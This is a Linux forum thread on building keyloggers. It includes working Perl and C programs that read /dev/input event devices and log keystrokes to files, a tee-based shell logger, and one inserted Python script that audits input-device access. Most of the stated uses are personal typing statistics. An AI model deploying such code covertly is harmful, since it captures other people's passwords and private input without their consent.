LinuxQuestions.org
Old 06-16-2006, 04:28 AM   #16
Worksman
Member
 
Registered: Sep 2004
Location: Romania
Distribution: Ubuntu, Debian, Arch Linux, Gentoo, Slackware
Posts: 171
Blog Entries: 1

Rep: Reputation: 31
Suggestion: Start a new Thread!


Quote:
Originally Posted by NetBlaster
hi there, i learnt C, but then I'm kind of still learning now though, I'm gonna take a step to C++ when i find a decent book to learn from, and some reasonable resources, then eventually I'll take a look at python or perl, wanna talk about summat, just ask!
If you guys want to collaborate (since we all are newbies to C/C++ or Python) start a Thread in the Programming Forum called something like "Place for programming newbies to meet and learn together". I sure want to exchange experiences and knowledge with other newbies instead of learning all by myself, seems wrong to me. Hey and maybe experienced programmers will join and give help when needed to 's.
Just don't forget to tell us when you do start the thread.
This thread can still remain usable but it should be moved to the same forum, Programming.
 
Old 06-16-2006, 08:34 AM   #17
DJF5
LQ Newbie
 
Registered: Sep 2005
Location: Heerhugowaard, Netherlands
Distribution: CentOS 4
Posts: 1

Rep: Reputation: Disabled
Always leave your text editor on... that way you will know what keys are pressed on your system...

just kidding... but do you want to log them physically? then that's the way. If you would want to log ssh-sessions too, that would be another story...
 
Old 06-16-2006, 11:12 AM   #18
cpbills
LQ Newbie
 
Registered: Jun 2006
Distribution: slackware and/or debian
Posts: 5

Rep: Reputation: 0
here's about where i stopped caring...

simple perl script to read and print out what keys are pressed (based on their codes, not 'A', 'B' etc...)

make sure you set $DEV equal to whatever device evdev creates...
Code:
#!/usr/bin/perl -w

use strict;

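# Event device created by evdev; adjust for your system
my $DEV     = '/dev/input/event1';

open(FILE, '<', $DEV) or die "cannot open $DEV: $!";
binmode FILE;
while (1) {
    my $line = "";
    # One event is 16 bytes here (32-bit struct input_event)
    my $n = sysread(FILE,$line,16);
    last unless defined $n && $n == 16;   # stop on error or short read
    my @vals = split(//,$line);

    # byte 10 = low byte of the key code, byte 12 = low byte of the value
    if (ord($vals[10]) != 0) {
        interpret(ord($vals[10]),ord($vals[12]));
    }
}
close FILE;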

sub interpret {
    my $keycode = shift;
    my $state   = shift;

    if ($state == 0) {
        print "$keycode up\n";
    }
    if ($state == 1) {
        print "$keycode down\n";
    }
    if ($state == 2) {
        print "$keycode repeat\n";
    }
}
 
Old 06-16-2006, 12:07 PM   #19
apeekaboo
Member
 
Registered: Apr 2003
Location: Stockholm/Sweden
Distribution: Kubuntu, Debian, Slax
Posts: 91

Rep: Reputation: 16
Quote:
Originally Posted by roclok
Is there any way that I can write a script that runs all the time, every time i start computer that will log ever keystroke? If so how do I do this, or must I download a program.
You don't mention if you want to do this for all users or only for yourself.
Using the script command might be sufficient depending on your needs.
 
Old 06-16-2006, 12:22 PM   #20
cpbills
LQ Newbie
 
Registered: Jun 2006
Distribution: slackware and/or debian
Posts: 5

Rep: Reputation: 0
also, the command 'script' may be useful for recording terminal sessions, for the guy who wanted to record what he'd done.

i would also recommend modifying the perl script i posted to log the keycode and key state only, and write an interpreter script, that way your passwords and such aren't logged in an obvious manner...

i.e.

Code:
sub interpret {
    my $keycode = shift;
    my $state = shift;

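    # Open for append; a bare open() would open the file read-only
    open(my $log, '>>', '/var/log/keylog') or die "cannot open log: $!";
    print $log "$keycode $state ";
    close $log;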
}

Last edited by cpbills; 06-16-2006 at 12:25 PM.
 
Old 06-16-2006, 03:33 PM   #21
jyoung4
LQ Newbie
 
Registered: Apr 2006
Location: Minneapolis, Minnesota, USA
Posts: 16

Rep: Reputation: 1
Getting back to the original question, a really simple keylogger that will log most of what you type in is:

tee /tmp/keylog | /bin/ksh

You simply start a shell with the tee command sending a copy of everything you type to both the shell and a file. It's not as elegant as the evbug solution discussed above but depending on what you need the output for, it might be enough.
 
Old 06-16-2006, 03:47 PM   #22
evilbohdran
LQ Newbie
 
Registered: Sep 2005
Distribution: Gentoo
Posts: 5

Rep: Reputation: 0
An additional clue, you can use the 'dumpkeys' command to show you what the keycodes map to for your particular keyboard. Perhaps someone can modify the perl code posted to grep thru and translate the codes to real characters.

Quote:
$ dumpkeys
keycode 16 = q
keycode 17 = w
keycode 18 = e
keycode 19 = r
keycode 20 = t
keycode 21 = y
...
 
Old 06-17-2006, 07:23 AM   #23
rob314159
LQ Newbie
 
Registered: May 2006
Distribution: Debian
Posts: 1

Rep: Reputation: 0
Quote:
Originally Posted by j13ett5
/dev/input/event0 seems to be the device to read.

as root the command:

od -tx1 /dev/input/dev0

will give a hex dump in real-time.
every up/down produces 16 bytes of data.
no doubt the details of it are in the kernel documentation somewhere.
Maybe you meant

od -tx1 /dev/input/event0

/rob
 
Old 06-21-2006, 08:16 PM   #24
MBA Whore
Member
 
Registered: May 2006
Location: Kansas City, MO
Distribution: Various: pclos, Debian, Ubuntu, etc . . .
Posts: 580

Rep: Reputation: 30
Linux Key Logger / Root

Correct me if I am wrong, but wouldn't any Linux key logger need root access? That is the way it works with Windows, correct?
 
Old 06-22-2006, 05:05 AM   #25
Worksman
Member
 
Registered: Sep 2004
Location: Romania
Distribution: Ubuntu, Debian, Arch Linux, Gentoo, Slackware
Posts: 171
Blog Entries: 1

Rep: Reputation: 31
Quote:
Originally Posted by MBA Whore
Correct me if I am wrong, but wouldn't any Linux key logger need root access? That is the way it works with Windows, correct?
The Linux philosophy is that everything is a file. That means you need at least read access to the file you *read* the key logs from.
If the file is a character device (in /dev/input/ as discussed earlier) then you need to be either root or in the same group as the file/device (presuming the file has the appropriate read permissions for the group). E.g., if you make a kernel module that would create /dev/kbdlog then you could make the file 0660 and be of group loggers. Only people in the loggers group have "6" access which is read/write.
On the other hand if you use evdev or evbug you need read access to the logs it writes to (which are handled by syslogd or klogd). Usually it will write to /var/log/messages so you got it, you need read access to that file. But syslog can be configured so you could route messages from evbug to some other file.

Last edited by Worksman; 06-22-2006 at 05:07 AM.
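
An added example, not part of the thread or any poster's code: a defender's audit in Python of the access rule described in the post above. It reports which /dev/input/event* nodes are readable by anyone other than root and which processes currently hold one open; the function names are hypothetical, and the `dev_dir` and `proc_root` parameters exist so the checks can be run against a constructed directory tree.

```python
import os
import stat


def classify(mode, uid, gid):
    """Return who besides root can read a device node with these attributes."""
    findings = []
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    if mode & stat.S_IRGRP and gid != 0:
        findings.append(f"readable by gid {gid}")
    if mode & stat.S_IRUSR and uid != 0:
        findings.append(f"owned and readable by uid {uid}")
    return findings


def audit_nodes(dev_dir="/dev/input"):
    """Map each event node to its findings; an empty list means root only."""
    report = {}
    for name in sorted(os.listdir(dev_dir)):
        if name.startswith("event"):
            st = os.stat(os.path.join(dev_dir, name))
            report[name] = classify(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)
    return report


def open_handles(proc_root="/proc", prefix="/dev/input/event"):
    """Return sorted (pid, target) pairs for processes holding an input node open."""
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:  # process exited, or we lack permission to look
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if target.startswith(prefix):
                hits.append((int(pid), target))
    return sorted(set(hits))


if __name__ == "__main__":
    if os.path.isdir("/dev/input"):
        for node, findings in audit_nodes().items():
            print(node, ", ".join(findings) or "root only")
    for pid, target in open_handles():
        print(f"pid {pid} has {target} open")
```

Run it as root so every process's fd directory is visible. The display server or compositor normally appears in the output; any other process holding an event node open is worth explaining.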
 
Old 09-04-2006, 05:03 PM   #26
lixy
Member
 
Registered: Apr 2004
Posts: 120

Rep: Reputation: 15
Quote:
Originally Posted by Worksman
Code:
[4298922.635000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 1, Code: 103, Value: 0
[4298922.635000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0
[4298923.302000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 4, Code: 4, Value: 200
[4298923.302000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 1, Code: 103, Value: 1
[4298923.302000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0
[4298923.380000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 4, Code: 4, Value: 200
[4298923.380000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 1, Code: 103, Value: 0
[4298923.380000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0
Interesting thread!
Does anyone know what those [4298922.635000] at the beginning mean? I wonder if that is not the time of the event.
I'm trying to record the exact time of each keypress but not convinced as to how reliable such values are. I mean, isn't there an inherent delay when reading keyboard interrupts that may vary depending on the availability of the system's resources? If so, that delay will be random and the only way to know the exact time of the keystroke is by some kind of hardware. Any input welcome!

Back to the original topic, there are a couple of keyloggers around for linux. Try lkl. There's also a GPL'ed python code for that.
 
Old 09-04-2006, 10:54 PM   #27
j13ett5
LQ Newbie
 
Registered: Nov 2005
Distribution: debian
Posts: 13

Rep: Reputation: 1
Quote:
Originally Posted by lixy
Interesting thread!
Does anyone know what those [4298922.635000] at the beginning mean? I wonder if that is not the time of the event.
it has the look of a timestamp but I can't figure out the units

Quote:
Originally Posted by lixy
I'm trying to record the exact time of each keypress but not convinced as to how reliable such values are. I mean, isn't there an inherent delay when reading keyboard interrupts that may vary depending on the availability of the system's resources?
it should be good to within 10ms in most cases and 100ms in almost all cases
(except crippling loads)

Quote:
Originally Posted by lixy
If so, that delay will be random and the only way to know the exact time of the keystroke is by some kind of hardware. Any input welcome!
gettimeofday() reads the hardware clock (timer chip not RTC chip) and tells
you how long since midnight (UTC IIRC) in microseconds (result is precise to 1us)
 
Old 09-06-2006, 11:00 AM   #28
MBA Whore
Member
 
Registered: May 2006
Location: Kansas City, MO
Distribution: Various: pclos, Debian, Ubuntu, etc . . .
Posts: 580

Rep: Reputation: 30
I am not a genius but. . .

. . .could anyone tell me WHY anyone would want a key logger on a linux box?

Also, would you have to be running as "root" for the keylogger to work, or not?

Thanks!
 
Old 09-06-2006, 03:24 PM   #29
lixy
Member
 
Registered: Apr 2004
Posts: 120

Rep: Reputation: 15
Quote:
Originally Posted by MBA Whore
. . .could anyone tell me WHY anyone would want a key logger on a linux box?
Because you can!!!

Quote:
Originally Posted by MBA Whore
Also, would you have to be running as "root" for the keylogger to work, or not?
Since you'll probably be wanting to record what would go on in all accounts, yes! Otherwise, the current user's privileges are enough.
 
Old 03-18-2007, 05:59 PM   #30
phi
LQ Newbie
 
Registered: Jan 2005
Posts: 22

Rep: Reputation: 3
Same in C, but little different

Hello everybody

I was looking for a key-logging facility since weeks. Thanks for all your posts. (It was originally not my post, but the result fits my question best.)

Here I post my C-routine I will use to optimize my .Xmodmap to type faster.
This code is a modification of the previously posted PERL-Code.

Code:
/**
 * Key Logger for counting keystrokes.
 * Together with "dumpkeys" this could be handy to count which 
 * letters 
 *    a) are pressed most
 *    b) can be pressed fastest.
 *
 * I personally will use this keylogger to find out
 *    a) which letters I type most
 *    b) which keys I type fastest
 *
 * These statistical results will enable me to 
 * generate my own personalized "dvorak" keyboard.
 */

#include <stdio.h>

#define INPUT_QUEUE "/dev/input/event0"
#define OUTPUT_QUEUE "/home/phi/dev/c/keylogger/key.log"
#define EVENT_LEN 16

/* Read the next input line from INPUT_QUEUE
 * which are 16 byte (= sizeof struct input_event {...}).
 */
 /* try the elements of input_event using the following command
  * >od -tx1 /dev/input/event0
  */
void readEventLine(FILE * in, char * data) {
  int i;
  for(i = 0; i <= 15; i++) {
    data[i] = (char) fgetc(in);
  }
}

/*
 * Return the value of a character as unsigned byte
 */
int val(char c) {
  if((int) c < 0) {
    return (int) c + 256;
  } else {
    return (int) c;
  }
}

/* return the time of the input_event in seconds
 * (bytes 0..3 of the event, least significant byte first) */
long makeSeconds (char * data) {
  long result;
  result = ((((long) val(data[3]) * 256 + val(data[2])) * 256) + val(data[1])) * 256 + val(data[0]);
  return result; 
}

/* return the microsecond part of the time structure.
   Be aware: on other machines than i386 the struct input_event could 
   have a different size!
 */
long makeMicros (char * data) {
  long result;
  result =  (val(data[6]) * 256 + val(data[5])) * 256 + val(data[4]);
  return result; 
}

int main(int argc, char * args[]) {
  FILE * input;
  FILE * output;
  char data[EVENT_LEN];

  input = fopen(INPUT_QUEUE,  "r");
  if(NULL == input) {
    printf("Error opening input");
    return -1;
  }

  output = fopen(OUTPUT_QUEUE, "a");
  if(NULL == output) {
    printf("output not opened");
    return -1;
  }

  while(-1) {
    readEventLine(input, data);
    if(1 == data[8]) // press or release??
      { 
        /* both values are long; zero-pad the microseconds to six digits */
        fprintf(output, "%ld.%06ld", makeSeconds(data), makeMicros(data));
        if(1 == data[12]) { // PRESS
          fprintf(output, "+%i\n", data[10]);
        }
        if(0 == data[12]) {// RELEASE
          fprintf(output, "-%i\n", data[10]);
        }
      }

    fflush(output);
  }

  fclose(input);
  fclose(output);
}
Has anyone a good idea (like dumpkeys) to translate the above keycodes to the pressed letters and symbols?
The problem will be to store the state of the Meta keys (control, alt, shift, ...).

Another (little related) problem is to start the key logger only when I am logged in. I don't want other users (In my case only my wife working in her account) to spoil my great optimizing 10-Finger project. But this is probably a Gnome question.

Last edited by phi; 03-18-2007 at 06:02 PM.
 
  


All times are GMT -5.